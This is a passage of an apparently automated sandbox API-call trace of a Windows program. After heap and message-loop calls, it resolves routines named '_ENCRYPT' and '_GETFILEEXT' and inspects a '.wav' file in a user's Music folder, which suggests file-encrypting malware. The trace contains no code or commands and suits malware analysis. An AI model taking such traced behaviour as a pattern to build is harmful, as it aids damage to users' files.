(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0187.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0187.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0187.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0187.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0187.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0187.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0187.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0187.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0187.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0187.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0187.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0187.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0187.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0187.865] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0187.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0187.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0187.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0187.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0187.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.867] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.867] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.867] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0187.867] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.867] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0187.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.868] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0187.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0187.868] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.868] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0187.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0187.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0187.869] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.869] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0187.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.869] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0187.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0187.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0187.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.869] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.869] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.869] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.870] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5c7070, ftCreationTime.dwHighDateTime=0x1d5d84f, ftLastAccessTime.dwLowDateTime=0x3e6d8870, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0x3e6d8870, ftLastWriteTime.dwHighDateTime=0x1d5dc39, nFileSizeHigh=0x0, nFileSizeLow=0x18df5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="tCz4fpeQ.wav", cAlternateFileName="")) returned 0x90add8 [0187.870] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0187.870] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.870] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5c7070, ftCreationTime.dwHighDateTime=0x1d5d84f, ftLastAccessTime.dwLowDateTime=0x3e6d8870, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0x3e6d8870, ftLastWriteTime.dwHighDateTime=0x1d5dc39, nFileSizeHigh=0x0, nFileSizeLow=0x18df5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="tCz4fpeQ.wav", cAlternateFileName="")) returned 0x90add8 [0187.870] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0187.871] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\tCz4fpeQ.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\tCz4fpeQ.wav\"", 